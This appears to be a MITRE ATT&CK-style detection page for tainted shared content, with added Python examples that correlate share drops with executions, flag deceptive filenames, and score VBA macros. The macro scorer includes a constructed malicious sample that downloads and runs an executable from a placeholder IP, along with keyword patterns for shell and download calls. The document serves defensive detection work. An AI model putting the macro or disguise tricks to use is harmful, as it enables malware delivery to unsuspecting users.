DET0471 Detection of Tainted Content Written to Shared Storage
| Item | Value |
| --- | --- |
| ID | DET0471 |
| Version | 1.0 |
| Created | 21 October 2025 |
| Last Modified | 21 October 2025 |
Technique Detected: T1080 (Taint Shared Content)
Analytics
Windows
AN1298
Detects adversary tampering with shared directories: a file drop of an executable type (e.g., a malicious LNK, EXE, or VBS) into a share, followed by another user executing that file or by suspicious network activity from the host that ran it.
Log Sources
Mutable Elements
| Field | Description |
| --- | --- |
| SharedPathPrefix | Monitored shared directories, as UNC prefixes (e.g., \\server\HR). |
| ExecutableExtensions | File types to flag when written into a shared path (e.g., .lnk, .exe, .vbs). |
Linux
AN1299
Detects script or binary modification within shared NFS/SMB directories followed by process execution from those paths.
Log Sources
Mutable Elements
| Field | Description |
| --- | --- |
| MountPath | Mount path of the monitored shared volumes (e.g., /mnt/shared). |
| FilenamePattern | Pattern matching for abnormal or disguised filenames. |
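The Windows (AN1298) and Linux (AN1299) analytics reduce to the same correlation: a file of an executable type is written into a monitored share, and within some window a process starts from that same path under a different account. The Python below is an added example of that correlation, not MITRE's or the ATT&CK project's code; the Event schema, the SharedPathPrefix/MountPath and ExecutableExtensions values, the 24-hour window, and the sample events are all constructed for illustration and must be mapped onto real telemetry (for Windows, file-create and process-create events such as Sysmon IDs 11 and 1; for Linux, auditd PATH/EXECVE records).

```python
"""Added example (not MITRE's code): correlate a file dropped into a monitored share
with its later execution from the share by a different user. The Event schema,
mutable-element values and sample events are constructed for illustration."""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta

# Mutable elements from AN1298/AN1299 (values assumed for this example).
SHARED_PATH_PREFIXES = [r"\\server\HR", "/mnt/shared"]        # SharedPathPrefix / MountPath
EXECUTABLE_EXTENSIONS = {".lnk", ".exe", ".vbs", ".sh", ".py"}  # ExecutableExtensions
EXECUTION_WINDOW = timedelta(hours=24)  # how long after a drop an execution still correlates


@dataclass
class Event:
    ts: datetime
    kind: str   # "file_write" or "process_create"
    host: str
    user: str
    path: str   # the written file, or the image/script path a new process ran from


def normalize(path: str) -> str:
    """Lower-case and unify separators so UNC and POSIX paths compare the same way."""
    return path.replace("\\", "/").lower().rstrip("/")


def in_shared_path(path: str) -> bool:
    p = normalize(path)
    return any(p.startswith(normalize(prefix) + "/") for prefix in SHARED_PATH_PREFIXES)


def has_executable_extension(path: str) -> bool:
    name = normalize(path).rsplit("/", 1)[-1]
    return any(name.endswith(ext) for ext in EXECUTABLE_EXTENSIONS)


def find_tainted_execution(events: list[Event]) -> list[dict]:
    """Alert when a file written to a share by one user is executed from it by another."""
    last_write: dict[str, Event] = {}
    alerts: list[dict] = []
    for ev in sorted(events, key=lambda e: e.ts):
        if not (in_shared_path(ev.path) and has_executable_extension(ev.path)):
            continue
        key = normalize(ev.path)
        if ev.kind == "file_write":
            last_write[key] = ev  # newest drop wins; older drops age out via the window
        elif ev.kind == "process_create" and key in last_write:
            w = last_write[key]
            # Same-user execution (someone running a script they just saved) is the
            # common benign case; T1080 is about *other* users being tricked into it.
            if ev.ts - w.ts <= EXECUTION_WINDOW and ev.user.lower() != w.user.lower():
                alerts.append({
                    "path": ev.path,
                    "written_by": w.user, "written_on": w.host, "written_at": w.ts,
                    "executed_by": ev.user, "executed_on": ev.host, "executed_at": ev.ts,
                })
    return alerts


def _t(hour: int, minute: int) -> datetime:
    return datetime(2025, 10, 21, hour, minute)


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    Event(_t(9, 0),   "file_write",     "fs01",     r"CORP\mallory", r"\\server\HR\Benefits_Update.lnk"),
    Event(_t(9, 31),  "process_create", "ws-alice", r"CORP\alice",   r"\\server\HR\Benefits_Update.lnk"),
    Event(_t(10, 0),  "file_write",     "build01",  "bob",   "/mnt/shared/tools/deploy.sh"),
    Event(_t(10, 5),  "process_create", "build01",  "bob",   "/mnt/shared/tools/deploy.sh"),  # same user
    Event(_t(10, 10), "process_create", "web01",    "carol", "/mnt/shared/tools/deploy.sh"),  # other user
    Event(_t(11, 0),  "file_write",     "ws-dave",  "dave",  r"C:\Users\dave\notes.exe"),     # not a share
    Event(_t(11, 2),  "process_create", "ws-dave",  "eve",   r"C:\Users\dave\notes.exe"),
    Event(_t(12, 0),  "process_create", "ws-frank", "frank", r"\\server\HR\legacy.exe"),      # no drop seen
]

if __name__ == "__main__":
    for a in find_tainted_execution(SAMPLE_EVENTS):
        print(f"{a['written_by']} dropped {a['path']} on {a['written_on']}; "
              f"executed by {a['executed_by']} on {a['executed_on']} at {a['executed_at']:%H:%M}")
```

Run as-is it reports the two cross-user executions (the LNK on the Windows share and deploy.sh on the NFS mount) and stays silent on the same-user run, the non-share path, and the binary with no observed drop. Tightening EXECUTION_WINDOW or dropping the same-user exemption trades missed cases for noise; both knobs are the mutable elements the analytic exposes.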
macOS
AN1300
Detects the placement of .app bundles or script files with deceptive names into shared network folders, where the name uses a hidden extension or a double extension (e.g., a file whose name ends in .docx.app).
Log Sources
Mutable Elements
| Field | Description |
| --- | --- |
| FileExtensionDeception | Monitors use of hidden extensions or double extensions. |
| TargetSharedFolder | Defines sensitive shared folders (e.g., /Users/Shared/HR). |
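The FileExtensionDeception element is the part of AN1300 that needs actual logic: deciding, from the name a user will see in Finder, whether a new item in a TargetSharedFolder is dressed up as a document. The following Python is an added example of that check and is not MITRE's code; the folder list, extension sets, and sample paths are constructed. It looks only at the path string (including the enclosing .app bundle name when a write lands inside a bundle) and does not model Finder's per-file "hide extension" attribute, which would need file metadata.

```python
"""Added example (not MITRE's code): flag deceptively named files and .app bundles
written into sensitive shared folders. Folder list, extension sets and sample paths
are constructed for this example."""
from __future__ import annotations

TARGET_SHARED_FOLDERS = ["/Users/Shared/HR", "/Volumes/Finance"]   # TargetSharedFolder (assumed)
DOCUMENT_EXTENSIONS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt", "jpg", "png"}
EXECUTABLE_EXTENSIONS = {"app", "sh", "command", "scpt", "py", "pkg", "dmg"}
# Unicode bidirectional controls: they reorder how the name is *displayed* without changing it.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                 "\u2066", "\u2067", "\u2068", "\u2069"}


def deception_indicators(filename: str) -> list[str]:
    """FileExtensionDeception: reasons a single file or bundle name looks disguised."""
    reasons: list[str] = []
    if any(ch in BIDI_CONTROLS for ch in filename):
        reasons.append("bidi_override")            # e.g. "invoice<U+202E>fdp.sh"
    parts = filename.split(".")
    if len(parts) >= 3:
        inner, outer = parts[-2].rstrip().lower(), parts[-1].lower()
        if inner in DOCUMENT_EXTENSIONS and outer in EXECUTABLE_EXTENSIONS:
            reasons.append("double_extension")     # "Report.docx.app"
        if parts[-2] != parts[-2].rstrip():
            reasons.append("whitespace_padding")   # "Report.pdf        .command"
    return reasons


def in_target_folder(path: str) -> bool:
    return any(path == f or path.startswith(f + "/") for f in TARGET_SHARED_FOLDERS)


def bundle_component(path: str) -> str | None:
    """For writes inside an .app bundle, return the bundle's own name (what Finder shows)."""
    for comp in path.split("/"):
        if comp.lower().endswith(".app"):
            return comp
    return None


def evaluate_write(path: str) -> dict | None:
    """Return a finding for a file-create/modify event in a target folder, or None."""
    if not in_target_folder(path):
        return None
    bundle = bundle_component(path)
    display_name = bundle or path.rsplit("/", 1)[-1]
    reasons = deception_indicators(display_name)
    if bundle and not reasons:
        # AN1300 treats .app bundles appearing in shared folders as notable on their own.
        reasons.append("app_bundle_in_shared_folder")
    if not reasons:
        return None
    return {"path": path, "display_name": display_name, "reasons": reasons}


def scan_writes(paths: list[str]) -> list[dict]:
    return [f for f in (evaluate_write(p) for p in paths) if f]


# Constructed sample write events (not real telemetry).
SAMPLE_WRITES = [
    "/Users/Shared/HR/Q3_Payroll.docx.app/Contents/MacOS/Q3_Payroll",
    "/Users/Shared/HR/Benefits_2025.pdf",
    "/Users/Shared/HR/Onboarding.pdf      .command",
    "/Users/Shared/HR/Installer.app/Contents/Info.plist",
    "/Users/Shared/HR/invoice\u202efdp.sh",
    "/Users/alice/Desktop/notes.txt.sh",          # outside any target folder
    "/Volumes/Finance/photo.jpg.py",
]

if __name__ == "__main__":
    for f in scan_writes(SAMPLE_WRITES):
        print(f"{f['display_name']!r}: {', '.join(f['reasons'])}")
```

The double-extension rule only fires when the inner extension is a document type and the outer one is something macOS will execute or mount, which keeps ordinary names such as backup.tar.gz out of the alert stream; the whitespace and bidi checks catch the two ways attackers push the real extension out of view in a Finder column.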
SaaS
AN1301
Detects upload of malicious or unusual file types into cloud-shared folders, followed by user downloads or interactions.
Log Sources
Mutable Elements
| Field | Description |
| --- | --- |
| UserUploadRateThreshold | Upload rate into shared drives above which a user's activity is treated as abnormal. |
| MaliciousFileIndicator | File hash or known-bad filename pattern matching. |
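AN1301 combines three signals from a cloud drive's audit log: a burst of uploads by one user into shared folders (UserUploadRateThreshold), an uploaded file matching a hash or filename indicator (MaliciousFileIndicator), and a different user then downloading that file. The Python below is an added example of that evaluation over sample audit events, not MITRE's code and not any vendor's API; the event fields, the threshold and window values, the indicator lists (the "known-bad" hash is computed from a constructed byte string) and the sample events are all constructed for illustration.

```python
"""Added example (not MITRE's code): evaluate cloud-drive audit events for upload
bursts into shared folders, known-bad uploads, and downloads of those uploads by
other users. Schema, thresholds, indicators and sample events are constructed."""
from __future__ import annotations

import hashlib
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Mutable elements (assumed values).
USER_UPLOAD_RATE_THRESHOLD = 5                # UserUploadRateThreshold: uploads per window
UPLOAD_RATE_WINDOW = timedelta(minutes=10)
SHARED_FOLDER_PREFIXES = ["/Shared/", "/Teams/"]
BAD_SAMPLE_SHA256 = hashlib.sha256(b"constructed bad sample, not a real malware hash").hexdigest()
KNOWN_BAD_SHA256 = {BAD_SAMPLE_SHA256}        # MaliciousFileIndicator: hash list
KNOWN_BAD_NAME_PATTERNS = [                   # MaliciousFileIndicator: filename patterns
    r"\.(lnk|exe|vbs|hta|js|scr)$",           # executable types in a document share
    r"\.(pdf|docx?|xlsx?)\.\w+$",             # document extension hiding a second one
]


def is_shared(folder: str) -> bool:
    return any(folder.startswith(p) for p in SHARED_FOLDER_PREFIXES)


def malicious_indicator(ev: dict) -> str | None:
    if ev.get("sha256") in KNOWN_BAD_SHA256:
        return "known_bad_hash"
    for pat in KNOWN_BAD_NAME_PATTERNS:
        if re.search(pat, ev["file"], re.IGNORECASE):
            return f"filename_pattern:{pat}"
    return None


def evaluate(events: list[dict]) -> list[dict]:
    alerts: list[dict] = []
    recent_uploads: dict[str, deque] = defaultdict(deque)   # user -> upload timestamps in window
    burst_alerted: set[str] = set()
    tainted: dict[tuple[str, str], str] = {}                # (folder, file) -> uploader
    for ev in sorted(events, key=lambda e: e["ts"]):
        if not is_shared(ev["folder"]):
            continue  # personal-drive activity is out of scope for this analytic
        key = (ev["folder"], ev["file"])
        if ev["action"] == "upload":
            q = recent_uploads[ev["user"]]
            q.append(ev["ts"])
            while q and ev["ts"] - q[0] > UPLOAD_RATE_WINDOW:
                q.popleft()
            if len(q) > USER_UPLOAD_RATE_THRESHOLD and ev["user"] not in burst_alerted:
                burst_alerted.add(ev["user"])   # one burst alert per user
                alerts.append({"rule": "upload_burst", "user": ev["user"],
                               "count": len(q), "folder": ev["folder"]})
            why = malicious_indicator(ev)
            if why:
                tainted[key] = ev["user"]
                alerts.append({"rule": "malicious_file_upload", "user": ev["user"],
                               "file": ev["file"], "folder": ev["folder"], "indicator": why})
        elif ev["action"] == "download" and key in tainted and tainted[key] != ev["user"]:
            alerts.append({"rule": "tainted_file_download", "user": ev["user"],
                           "uploaded_by": tainted[key], "file": ev["file"], "folder": ev["folder"]})
    return alerts


def _ev(h, m, action, user, folder, file, sha256=None) -> dict:
    return {"ts": datetime(2025, 10, 21, h, m), "action": action, "user": user,
            "folder": folder, "file": file, "sha256": sha256}


# Constructed sample audit events (not real logs).
SAMPLE_EVENTS = [
    _ev(9, 0,  "upload",   "mallory", "/Shared/HR", "Benefits_FAQ.docx"),
    _ev(9, 1,  "upload",   "mallory", "/Shared/HR", "Holiday_Calendar.pdf"),
    _ev(9, 2,  "upload",   "mallory", "/Shared/HR", "Payroll_2025.pdf.lnk"),
    _ev(9, 3,  "upload",   "mallory", "/Shared/HR", "Org_Chart.png"),
    _ev(9, 4,  "upload",   "mallory", "/Shared/HR", "Handbook.docx"),
    _ev(9, 5,  "upload",   "mallory", "/Shared/HR", "Q4_Bonus_Plan.docx"),
    _ev(9, 10, "download", "alice",   "/Shared/HR", "Payroll_2025.pdf.lnk"),
    _ev(9, 20, "upload",   "bob",     "/Shared/Finance", "Q3_Budget.xlsx"),
    _ev(9, 25, "download", "carol",   "/Shared/Finance", "Q3_Budget.xlsx"),
    _ev(9, 30, "download", "mallory", "/Shared/HR", "Payroll_2025.pdf.lnk"),   # uploader's own download
    _ev(9, 40, "upload",   "dave",    "/My Drive/dave", "setup.exe"),          # not a shared folder
    _ev(9, 50, "upload",   "eve",     "/Shared/IT", "Readme.txt", sha256=BAD_SAMPLE_SHA256),
    _ev(9, 55, "download", "frank",   "/Shared/IT", "Readme.txt"),
]

if __name__ == "__main__":
    for a in evaluate(SAMPLE_EVENTS):
        print(a)
```

The ordering matters: the burst rule only counts uploads into shared folders, so an attacker staging files in a personal drive first is not flagged until the copy into the share, and the download rule fires only for a file already marked tainted, which is what turns a file indicator into evidence that another user actually took the bait.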
Office Suite
AN1302
Detects macros or scripts embedded in shared documents, or external references in those documents that are used to execute code.
Log Sources
Mutable Elements
| Field | Description |
| --- | --- |
| MacroExecutionPolicy | Controls macro execution based on user or group policy. |
| SuspiciousKeywordMatch | Regex match on suspicious VBA function names or calls. |
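AN1302's two mutable elements fit together as a scorer and a gate: SuspiciousKeywordMatch turns extracted VBA into a list of hits per category, and MacroExecutionPolicy decides what to do with the document for a given user. The Python below is an added example of that pairing, not MITRE's code; the keyword categories, weights, policy values, and the two sample macros are constructed for illustration. Extracting the VBA stream from the document itself (with an OLE/OOXML parser such as oletools' olevba) is outside the snippet.

```python
"""Added example (not MITRE's code): score VBA source from a shared document for
auto-execution hooks, shell/download primitives, obfuscation helpers and external
references, then apply a group-based macro policy. Categories, weights, policy
values and both sample macros are constructed for illustration."""
from __future__ import annotations

import re

# SuspiciousKeywordMatch: one regex and a weight per category (assumed values).
SUSPICIOUS_KEYWORDS = {
    "auto_exec": (r"\b(AutoOpen|AutoExec|AutoClose|Auto_Open|Document_Open|Workbook_Open|Workbook_Activate)\b", 2),
    "process_exec": (r"(\bShell\s*\(|\bShellExecute\b|WScript\.Shell|Shell\.Application|Win32_Process)", 3),
    "download": (r"(URLDownloadToFile|MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest|ADODB\.Stream)", 3),
    "obfuscation": (r"\b(ChrW?|StrReverse)\s*\(", 1),
    # External references: UNC paths or URLs embedded in the macro text.
    "external_reference": (r"(\\\\[\w.$-]+\\[^\s\"']*|https?://[^\s\"']+)", 2),
}

# MacroExecutionPolicy (assumed): who may run macros from shared documents, and score cut-offs.
MACRO_EXECUTION_POLICY = {"allow_groups": {"macro-developers"}, "alert_score": 3, "block_score": 6}


def analyze_vba(source: str) -> dict:
    """Return per-category hits, an additive score (each category counted once) and a verdict."""
    matches: dict[str, list[str]] = {}
    for category, (pattern, _weight) in SUSPICIOUS_KEYWORDS.items():
        hits = [m.group(0) for m in re.finditer(pattern, source, re.IGNORECASE)]
        if hits:
            matches[category] = hits
    score = sum(SUSPICIOUS_KEYWORDS[c][1] for c in matches)
    if score >= MACRO_EXECUTION_POLICY["block_score"]:
        verdict = "block"
    elif score >= MACRO_EXECUTION_POLICY["alert_score"]:
        verdict = "alert"
    else:
        verdict = "allow"
    return {"matches": matches, "score": score, "verdict": verdict}


def enforce_policy(analysis: dict, user_groups: list[str]) -> str:
    """Gate macro execution for a user: group membership first, then the content score."""
    if not set(user_groups) & MACRO_EXECUTION_POLICY["allow_groups"]:
        return "block_by_policy"
    if analysis["score"] >= MACRO_EXECUTION_POLICY["block_score"]:
        return "block_suspicious"
    if analysis["score"] >= MACRO_EXECUTION_POLICY["alert_score"]:
        return "alert"
    return "allow"


# Constructed sample macros (not taken from any real document).
MALICIOUS_VBA = r'''
Sub AutoOpen()
    Dim o As Object
    Set o = CreateObject("WScript.Shell")
    Dim u As String
    u = "http://198.51.100.7/update.exe"
    URLDownloadToFile 0, u, Environ("TEMP") & "\upd.exe", 0, 0
    o.Run Environ("TEMP") & "\upd.exe", 0, False
End Sub
'''

BENIGN_VBA = r'''
Sub FormatReport()
    Dim ws As Worksheet
    Set ws = ActiveSheet
    ws.Range("A1:D1").Font.Bold = True
    ws.Columns("A:D").AutoFit
End Sub
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_VBA), ("benign", BENIGN_VBA)):
        a = analyze_vba(src)
        print(label, a["score"], a["verdict"], sorted(a["matches"]),
              enforce_policy(a, ["finance-analysts"]), enforce_policy(a, ["macro-developers"]))
```

Counting each category once rather than each hit keeps a long but honest macro that calls Chr() fifty times from outscoring a short one that hooks AutoOpen, spawns WScript.Shell and pulls a binary from a URL; the policy gate then makes the group decision explicit instead of burying it in the score.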